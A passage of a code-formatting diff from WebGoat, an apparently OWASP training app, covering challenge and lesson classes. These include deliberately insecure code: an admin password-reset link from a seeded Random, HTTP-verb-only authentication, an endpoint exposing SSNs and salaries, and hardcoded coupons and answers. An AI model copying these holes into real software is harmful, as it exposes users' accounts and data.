-        b = GG(b, c, d, a, x[12], 20, 0x8d2a4c8a); /* 32 */
-
-        /* Round 3 */
-        a = HH(a, b, c, d, x[5], 4, 0xfffa3942); /* 33 */
-        d = HH(d, a, b, c, x[8], 11, 0x8771f681); /* 34 */
-        c = HH(c, d, a, b, x[11], 16, 0x6d9d6122); /* 35 */
-        b = HH(b, c, d, a, x[14], 23, 0xfde5380c); /* 36 */
-        a = HH(a, b, c, d, x[1], 4, 0xa4beea44); /* 37 */
-        d = HH(d, a, b, c, x[4], 11, 0x4bdecfa9); /* 38 */
-        c = HH(c, d, a, b, x[7], 16, 0xf6bb4b60); /* 39 */
-        b = HH(b, c, d, a, x[10], 23, 0xbebfbc70); /* 40 */
-        a = HH(a, b, c, d, x[13], 4, 0x289b7ec6); /* 41 */
-        d = HH(d, a, b, c, x[0], 11, 0xeaa127fa); /* 42 */
-        c = HH(c, d, a, b, x[3], 16, 0xd4ef3085); /* 43 */
-        b = HH(b, c, d, a, x[6], 23, 0x04881d05); /* 44 */
-        a = HH(a, b, c, d, x[9], 4, 0xd9d4d039); /* 45 */
-        d = HH(d, a, b, c, x[12], 11, 0xe6db99e5); /* 46 */
-        c = HH(c, d, a, b, x[15], 16, 0x1fa27cf8); /* 47 */
-        b = HH(b, c, d, a, x[2], 23, 0xc4ac5665); /* 48 */
-
-        /* Round 4 */
-        a = II(a, b, c, d, x[0], 6, 0xf4292244); /* 49 */
-        d = II(d, a, b, c, x[7], 10, 0x432aff97); /* 50 */
-        c = II(c, d, a, b, x[14], 15, 0xab9423a7); /* 51 */
-        b = II(b, c, d, a, x[5], 21, 0xfc93a039); /* 52 */
-        a = II(a, b, c, d, x[12], 6, 0x655b59c3); /* 53 */
-        d = II(d, a, b, c, x[3], 10, 0x8f0ccc92); /* 54 */
-        c = II(c, d, a, b, x[10], 15, 0xffeff47d); /* 55 */
-        b = II(b, c, d, a, x[1], 21, 0x85845dd1); /* 56 */
-        a = II(a, b, c, d, x[8], 6, 0x6fa87e4f); /* 57 */
-        d = II(d, a, b, c, x[15], 10, 0xfe2ce6e0); /* 58 */
-        c = II(c, d, a, b, x[6], 15, 0xa3014314); /* 59 */
-        b = II(b, c, d, a, x[13], 21, 0x4e0811a1); /* 60 */
-        a = II(a, b, c, d, x[4], 6, 0xf7537e82); /* 61 */
-        d = II(d, a, b, c, x[11], 10, 0xbd3af235); /* 62 */
-        c = II(c, d, a, b, x[2], 15, 0x2ad7d2bb); /* 63 */
-        b = II(b, c, d, a, x[9], 21, 0xeb86d391); /* 64 */
-
-        state.state[0] += a;
-        state.state[1] += b;
-        state.state[2] += c;
-        state.state[3] += d;
-    }
+    state.state[0] += a;
+    state.state[1] += b;
+    state.state[2] += c;
+    state.state[3] += d;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
index c890fc27c..ff00f06cb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
@@ -10,34 +10,36 @@ import java.util.Random;
  */
 public class PasswordResetLink {
 
-    public String createPasswordReset(String username, String key) {
-        Random random = new Random();
-        if (username.equalsIgnoreCase("admin")) {
-            //Admin has a fix reset link
-            random.setSeed(key.length());
-        }
-        return scramble(random, scramble(random, scramble(random, MD5.getHashString(username))));
+  public String createPasswordReset(String username, String key) {
+    Random random = new Random();
+    if (username.equalsIgnoreCase("admin")) {
+      // Admin has a fix reset link
+      random.setSeed(key.length());
     }
+    return scramble(random, scramble(random, scramble(random, MD5.getHashString(username))));
+  }
 
-    public static String scramble(Random random, String inputString) {
-        char[] a = inputString.toCharArray();
-        for (int i = 0; i < a.length; i++) {
-            int j = random.nextInt(a.length);
-            char temp = a[i];
-            a[i] = a[j];
-            a[j] = temp;
-        }
-        return new String(a);
+  public static String scramble(Random random, String inputString) {
+    char[] a = inputString.toCharArray();
+    for (int i = 0; i < a.length; i++) {
+      int j = random.nextInt(a.length);
+      char temp = a[i];
+      a[i] = a[j];
+      a[j] = temp;
     }
+    return new String(a);
+  }
 
-    public static void main(String[] args) {
-        if (args == null || args.length != 2) {
-            System.out.println("Need a username and key");
-            System.exit(1);
-        }
-        String username = args[0];
-        String key = args[1];
-        System.out.println("Generation password reset link for " + username);
-        System.out.println("Created password reset link: " + new PasswordResetLink().createPasswordReset(username, key));
+  public static void main(String[] args) {
+    if (args == null || args.length != 2) {
+      System.out.println("Need a username and key");
+      System.exit(1);
     }
+    String username = args[0];
+    String key = args[1];
+    System.out.println("Generation password reset link for " + username);
+    System.out.println(
+        "Created password reset link: "
+            + new PasswordResetLink().createPasswordReset(username, key));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
index e4f330899..535b92f18 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
@@ -1,5 +1,9 @@
 package org.owasp.webgoat.lessons.challenges.challenge8;
 
+import java.util.HashMap;
+import java.util.Map;
+import java.util.stream.Collectors;
+import javax.servlet.http.HttpServletRequest;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -11,11 +15,6 @@ import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.stream.Collectors;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -24,46 +23,54 @@ import java.util.stream.Collectors;
 @Slf4j
 public class Assignment8 extends AssignmentEndpoint {
 
-    private static final Map<Integer, Integer> votes = new HashMap<>();
+  private static final Map<Integer, Integer> votes = new HashMap<>();
 
-    static {
-        votes.put(1, 400);
-        votes.put(2, 120);
-        votes.put(3, 140);
-        votes.put(4, 150);
-        votes.put(5, 300);
-    }
+  static {
+    votes.put(1, 400);
+    votes.put(2, 120);
+    votes.put(3, 140);
+    votes.put(4, 150);
+    votes.put(5, 300);
+  }
 
-    @GetMapping(value = "/challenge/8/vote/{stars}", produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public ResponseEntity<?> vote(@PathVariable(value = "stars") int nrOfStars, HttpServletRequest request) {
-        //Simple implementation of VERB Based Authentication
-        String msg = "";
-        if (request.getMethod().equals("GET")) {
-            var json = Map.of("error", true, "message", "Sorry but you need to login first in order to vote");
-            return ResponseEntity.status(200).body(json);
-        }
-        Integer allVotesForStar = votes.getOrDefault(nrOfStars, 0);
-        votes.put(nrOfStars, allVotesForStar + 1);
-        return ResponseEntity.ok().header("X-Flag", "Thanks for voting, your flag is: " + Flag.FLAGS.get(8)).build();
+  @GetMapping(value = "/challenge/8/vote/{stars}", produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public ResponseEntity<?> vote(
+      @PathVariable(value = "stars") int nrOfStars, HttpServletRequest request) {
+    // Simple implementation of VERB Based Authentication
+    String msg = "";
+    if (request.getMethod().equals("GET")) {
+      var json =
+          Map.of("error", true, "message", "Sorry but you need to login first in order to vote");
+      return ResponseEntity.status(200).body(json);
     }
+    Integer allVotesForStar = votes.getOrDefault(nrOfStars, 0);
+    votes.put(nrOfStars, allVotesForStar + 1);
+    return ResponseEntity.ok()
+        .header("X-Flag", "Thanks for voting, your flag is: " + Flag.FLAGS.get(8))
+        .build();
+  }
 
-    @GetMapping("/challenge/8/votes/")
-    public ResponseEntity<?> getVotes() {
-        return ResponseEntity.ok(votes.entrySet().stream().collect(Collectors.toMap(e -> "" + e.getKey(), e -> e.getValue())));
-    }
+  @GetMapping("/challenge/8/votes/")
+  public ResponseEntity<?> getVotes() {
+    return ResponseEntity.ok(
+        votes.entrySet().stream()
+            .collect(Collectors.toMap(e -> "" + e.getKey(), e -> e.getValue())));
+  }
 
-    @GetMapping("/challenge/8/votes/average")
-    public ResponseEntity<Map<String, Integer>> average() {
-        int totalNumberOfVotes = votes.values().stream().mapToInt(i -> i.intValue()).sum();
-        int categories = votes.entrySet().stream().mapToInt(e -> e.getKey() * e.getValue()).reduce(0, (a, b) -> a + b);
-        var json = Map.of("average", (int) Math.ceil((double) categories / totalNumberOfVotes));
-        return ResponseEntity.ok(json);
-    }
+  @GetMapping("/challenge/8/votes/average")
+  public ResponseEntity<Map<String, Integer>> average() {
+    int totalNumberOfVotes = votes.values().stream().mapToInt(i -> i.intValue()).sum();
+    int categories =
+        votes.entrySet().stream()
+            .mapToInt(e -> e.getKey() * e.getValue())
+            .reduce(0, (a, b) -> a + b);
+    var json = Map.of("average", (int) Math.ceil((double) categories / totalNumberOfVotes));
+    return ResponseEntity.ok(json);
+  }
 
-    @GetMapping("/challenge/8/notUsed")
-    public AttackResult notUsed() {
-        throw new IllegalStateException("Should never be called, challenge specific method");
-    }
+  @GetMapping("/challenge/8/notUsed")
+  public AttackResult notUsed() {
+    throw new IllegalStateException("Should never be called, challenge specific method");
+  }
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
index bb0f9ac4e..c610a1bd9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
@@ -11,13 +11,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class Challenge8 extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CHALLENGE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CHALLENGE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "challenge8.title";
-    }
+  @Override
+  public String getTitle() {
+    return "challenge8.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
index 8b5958c72..587761fc4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
@@ -33,13 +33,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class ChromeDevTools extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.GENERAL;
+  }
 
-    @Override
-    public String getTitle() {
-        return "3.chrome-dev-tools.title";//3rd lesson in General
-    }
+  @Override
+  public String getTitle() {
+    return "3.chrome-dev-tools.title"; // 3rd lesson in General
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
index 78bdddbe2..97677e9a9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
@@ -39,16 +39,16 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class NetworkDummy extends AssignmentEndpoint {
 
-    @PostMapping("/ChromeDevTools/dummy")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String successMessage) {
-        UserSessionData userSessionData = getUserSessionData();
-        String answer = (String) userSessionData.getValue("randValue");
+  @PostMapping("/ChromeDevTools/dummy")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String successMessage) {
+    UserSessionData userSessionData = getUserSessionData();
+    String answer = (String) userSessionData.getValue("randValue");
 
-        if (successMessage != null && successMessage.equals(answer)) {
-            return success(this).feedback("xss-dom-message-success").build();
-        } else {
-            return failed(this).feedback("xss-dom-message-failure").build();
-        }
+    if (successMessage != null && successMessage.equals(answer)) {
+      return success(this).feedback("xss-dom-message-success").build();
+    } else {
+      return failed(this).feedback("xss-dom-message-failure").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
index ee7e87dcf..7441ab4a5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
@@ -32,8 +32,8 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 /**
- * Assignment where the user has to look through an HTTP Request
- * using the Developer Tools and find a specific number.
+ * Assignment where the user has to look through an HTTP Request using the Developer Tools and find
+ * a specific number.
  *
  * @author TMelzer
  * @since 30.11.18
@@ -42,19 +42,21 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentHints({"networkHint1", "networkHint2"})
 public class NetworkLesson extends AssignmentEndpoint {
 
-    @PostMapping(value = "/ChromeDevTools/network", params = {"network_num", "number"})
-    @ResponseBody
-    public AttackResult completed(@RequestParam String network_num, @RequestParam String number) {
-        if (network_num.equals(number)) {
-            return success(this).feedback("network.success").output("").build();
-        } else {
-            return failed(this).feedback("network.failed").build();
-        }
+  @PostMapping(
+      value = "/ChromeDevTools/network",
+      params = {"network_num", "number"})
+  @ResponseBody
+  public AttackResult completed(@RequestParam String network_num, @RequestParam String number) {
+    if (network_num.equals(number)) {
+      return success(this).feedback("network.success").output("").build();
+    } else {
+      return failed(this).feedback("network.failed").build();
     }
+  }
 
-    @PostMapping(path = "/ChromeDevTools/network", params = "networkNum")
-    @ResponseBody
-    public ResponseEntity<?> ok(@RequestParam String networkNum) {
-        return ResponseEntity.ok().build();
-    }
+  @PostMapping(path = "/ChromeDevTools/network", params = "networkNum")
+  @ResponseBody
+  public ResponseEntity<?> ok(@RequestParam String networkNum) {
+    return ResponseEntity.ok().build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java b/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
index 03f5fd2bf..1754360b0 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
@@ -11,13 +11,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class CIA extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.GENERAL;
+  }
 
-    @Override
-    public String getTitle() {
-        return "4.cia.title";//4th lesson in general
-    }
+  @Override
+  public String getTitle() {
+    return "4.cia.title"; // 4th lesson in general
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java b/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
index bc7a1b0a7..fa01b43e5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
@@ -11,38 +11,43 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class CIAQuiz extends AssignmentEndpoint {
 
-    String[] solutions = {"Solution 3", "Solution 1", "Solution 4", "Solution 2"};
-    boolean[] guesses = new boolean[solutions.length];
+  String[] solutions = {"Solution 3", "Solution 1", "Solution 4", "Solution 2"};
+  boolean[] guesses = new boolean[solutions.length];
 
-    @PostMapping("/cia/quiz")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String[] question_0_solution, @RequestParam String[] question_1_solution, @RequestParam String[] question_2_solution, @RequestParam String[] question_3_solution) {
-        int correctAnswers = 0;
+  @PostMapping("/cia/quiz")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String[] question_0_solution,
+      @RequestParam String[] question_1_solution,
+      @RequestParam String[] question_2_solution,
+      @RequestParam String[] question_3_solution) {
+    int correctAnswers = 0;
 
-        String[] givenAnswers = {question_0_solution[0], question_1_solution[0], question_2_solution[0], question_3_solution[0]};
+    String[] givenAnswers = {
+      question_0_solution[0], question_1_solution[0], question_2_solution[0], question_3_solution[0]
+    };
 
-        for (int i = 0; i < solutions.length; i++) {
-            if (givenAnswers[i].contains(solutions[i])) {
-                // answer correct
-                correctAnswers++;
-                guesses[i] = true;
-            } else {
-                // answer incorrect
-                guesses[i] = false;
-            }
-        }
-
-        if (correctAnswers == solutions.length) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+    for (int i = 0; i < solutions.length; i++) {
+      if (givenAnswers[i].contains(solutions[i])) {
+        // answer correct
+        correctAnswers++;
+        guesses[i] = true;
+      } else {
+        // answer incorrect
+        guesses[i] = false;
+      }
     }
 
-    @GetMapping("/cia/quiz")
-    @ResponseBody
-    public boolean[] getResults() {
-        return this.guesses;
+    if (correctAnswers == solutions.length) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
+  @GetMapping("/cia/quiz")
+  @ResponseBody
+  public boolean[] getResults() {
+    return this.guesses;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
index 219d29c52..31c0867be 100644
--- a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -36,13 +37,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class ClientSideFiltering extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CLIENT_SIDE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CLIENT_SIDE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "client.side.filtering.title";
-    }
+  @Override
+  public String getTitle() {
+    return "client.side.filtering.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
index 2347697d5..fbe11da93 100644
--- a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
@@ -31,14 +31,19 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"ClientSideFilteringHint1", "ClientSideFilteringHint2", "ClientSideFilteringHint3", "ClientSideFilteringHint4"})
+@AssignmentHints({
+  "ClientSideFilteringHint1",
+  "ClientSideFilteringHint2",
+  "ClientSideFilteringHint3",
+  "ClientSideFilteringHint4"
+})
 public class ClientSideFilteringAssignment extends AssignmentEndpoint {
 
-    @PostMapping("/clientSideFiltering/attack1")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String answer) {
-        return "450000".equals(answer)
-                ? success(this).feedback("assignment.solved").build() :
-                failed(this).feedback("ClientSideFiltering.incorrect").build();
-    }
+  @PostMapping("/clientSideFiltering/attack1")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String answer) {
+    return "450000".equals(answer)
+        ? success(this).feedback("assignment.solved").build()
+        : failed(this).feedback("ClientSideFiltering.incorrect").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
index aeb1ccb42..9db150279 100644
--- a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
@@ -35,17 +35,21 @@ import org.springframework.web.bind.annotation.RestController;
  * @since 4/6/17.
  */
 @RestController
-@AssignmentHints({"client.side.filtering.free.hint1", "client.side.filtering.free.hint2", "client.side.filtering.free.hint3"})
+@AssignmentHints({
+  "client.side.filtering.free.hint1",
+  "client.side.filtering.free.hint2",
+  "client.side.filtering.free.hint3"
+})
 public class ClientSideFilteringFreeAssignment extends AssignmentEndpoint {
 
-    public static final String SUPER_COUPON_CODE = "get_it_for_free";
+  public static final String SUPER_COUPON_CODE = "get_it_for_free";
 
-    @PostMapping("/clientSideFiltering/getItForFree")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String checkoutCode) {
-        if (SUPER_COUPON_CODE.equals(checkoutCode)) {
-            return success(this).build();
-        }
-        return failed(this).build();
+  @PostMapping("/clientSideFiltering/getItForFree")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String checkoutCode) {
+    if (SUPER_COUPON_CODE.equals(checkoutCode)) {
+      return success(this).build();
     }
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
index 0aa286103..bd4de62fc 100644
--- a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
@@ -22,6 +22,20 @@
 
 package org.owasp.webgoat.lessons.clientsidefiltering;
 
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import javax.annotation.PostConstruct;
+import javax.xml.xpath.XPath;
+import javax.xml.xpath.XPathConstants;
+import javax.xml.xpath.XPathExpressionException;
+import javax.xml.xpath.XPathFactory;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.core.io.ClassPathResource;
@@ -33,79 +47,66 @@ import org.w3c.dom.Node;
 import org.w3c.dom.NodeList;
 import org.xml.sax.InputSource;
 
-import javax.annotation.PostConstruct;
-import javax.xml.xpath.XPath;
-import javax.xml.xpath.XPathConstants;
-import javax.xml.xpath.XPathExpressionException;
-import javax.xml.xpath.XPathFactory;
-import java.io.File;
-import java.io.FileInputStream;
-import java.io.FileOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
 @RestController
 @Slf4j
 public class Salaries {
 
-    @Value("${webgoat.user.directory}")
-    private String webGoatHomeDirectory;
+  @Value("${webgoat.user.directory}")
+  private String webGoatHomeDirectory;
 
-    @PostConstruct
-    public void copyFiles() {
-        ClassPathResource classPathResource = new ClassPathResource("lessons/employees.xml");
-        File targetDirectory = new File(webGoatHomeDirectory, "/ClientSideFiltering");
-        if (!targetDirectory.exists()) {
-            targetDirectory.mkdir();
-        }
-        try {
-            FileCopyUtils.copy(classPathResource.getInputStream(), new FileOutputStream(new File(targetDirectory, "employees.xml")));
-        } catch (IOException e) {
-            throw new RuntimeException(e);
-        }
+  @PostConstruct
+  public void copyFiles() {
+    ClassPathResource classPathResource = new ClassPathResource("lessons/employees.xml");
+    File targetDirectory = new File(webGoatHomeDirectory, "/ClientSideFiltering");
+    if (!targetDirectory.exists()) {
+      targetDirectory.mkdir();
     }
-
-    @GetMapping("clientSideFiltering/salaries")
-    @ResponseBody
-    public List<Map<String, Object>> invoke() {
-        NodeList nodes = null;
-        File d = new File(webGoatHomeDirectory, "ClientSideFiltering/employees.xml");
-        XPathFactory factory = XPathFactory.newInstance();
-        XPath path = factory.newXPath();
-        int columns = 5;
-        List<Map<String, Object>> json = new ArrayList<>();
-        java.util.Map<String, Object> employeeJson = new HashMap<>();
-
-        try (InputStream is = new FileInputStream(d)) {
-            InputSource inputSource = new InputSource(is);
-
-            StringBuilder sb = new StringBuilder();
-
-            sb.append("/Employees/Employee/UserID | ");
-            sb.append("/Employees/Employee/FirstName | ");
-            sb.append("/Employees/Employee/LastName | ");
-            sb.append("/Employees/Employee/SSN | ");
-            sb.append("/Employees/Employee/Salary ");
-
-            String expression = sb.toString();
-            nodes = (NodeList) path.evaluate(expression, inputSource, XPathConstants.NODESET);
-            for (int i = 0; i < nodes.getLength(); i++) {
-                if (i % columns == 0) {
-                    employeeJson = new HashMap<>();
-                    json.add(employeeJson);
-                }
-                Node node = nodes.item(i);
-                employeeJson.put(node.getNodeName(), node.getTextContent());
-            }
-        } catch (XPathExpressionException e) {
-            log.error("Unable to parse xml", e);
-        } catch (IOException e) {
-            log.error("Unable to read employees.xml at location: '{}'", d);
-        }
-        return json;
+    try {
+      FileCopyUtils.copy(
+          classPathResource.getInputStream(),
+          new FileOutputStream(new File(targetDirectory, "employees.xml")));
+    } catch (IOException e) {
+      throw new RuntimeException(e);
     }
+  }
+
+  @GetMapping("clientSideFiltering/salaries")
+  @ResponseBody
+  public List<Map<String, Object>> invoke() {
+    NodeList nodes = null;
+    File d = new File(webGoatHomeDirectory, "ClientSideFiltering/employees.xml");
+    XPathFactory factory = XPathFactory.newInstance();
+    XPath path = factory.newXPath();
+    int columns = 5;
+    List<Map<String, Object>> json = new ArrayList<>();
+    java.util.Map<String, Object> employeeJson = new HashMap<>();
+
+    try (InputStream is = new FileInputStream(d)) {
+      InputSource inputSource = new InputSource(is);
+
+      StringBuilder sb = new StringBuilder();
+
+      sb.append("/Employees/Employee/UserID | ");
+      sb.append("/Employees/Employee/FirstName | ");
+      sb.append("/Employees/Employee/LastName | ");
+      sb.append("/Employees/Employee/SSN | ");
+      sb.append("/Employees/Employee/Salary ");
+
+      String expression = sb.toString();
+      nodes = (NodeList) path.evaluate(expression, inputSource, XPathConstants.NODESET);
+      for (int i = 0; i < nodes.getLength(); i++) {
+        if (i % columns == 0) {
+          employeeJson = new HashMap<>();
+          json.add(employeeJson);
+        }
+        Node node = nodes.item(i);
+        employeeJson.put(node.getNodeName(), node.getTextContent());
+      }
+    } catch (XPathExpressionException e) {
+      log.error("Unable to parse xml", e);
+    } catch (IOException e) {
+      log.error("Unable to read employees.xml at location: '{}'", d);
+    }
+    return json;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
index f56d203b1..1a0f4fa92 100644
--- a/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
@@ -23,18 +23,16 @@
 package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import com.google.common.collect.Lists;
+import java.util.List;
+import java.util.Optional;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
-
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.List;
-import java.util.Optional;
-
 /**
  * @author nbaars
  * @since 4/6/17.
@@ -43,47 +41,46 @@ import java.util.Optional;
 @RequestMapping("/clientSideFiltering/challenge-store")
 public class ShopEndpoint {
 
-    @AllArgsConstructor
-    private class CheckoutCodes {
+  @AllArgsConstructor
+  private class CheckoutCodes {
 
-        @Getter
-        private List<CheckoutCode> codes;
+    @Getter private List<CheckoutCode> codes;
 
-        public Optional<CheckoutCode> get(String code) {
-            return codes.stream().filter(c -> c.getCode().equals(code)).findFirst();
-        }
+    public Optional<CheckoutCode> get(String code) {
+      return codes.stream().filter(c -> c.getCode().equals(code)).findFirst();
     }
+  }
 
-    @AllArgsConstructor
-    @Getter
-    private class CheckoutCode {
-        private String code;
-        private int discount;
+  @AllArgsConstructor
+  @Getter
+  private class CheckoutCode {
+    private String code;
+    private int discount;
+  }
+
+  private CheckoutCodes checkoutCodes;
+
+  public ShopEndpoint() {
+    List<CheckoutCode> codes = Lists.newArrayList();
+    codes.add(new CheckoutCode("webgoat", 25));
+    codes.add(new CheckoutCode("owasp", 25));
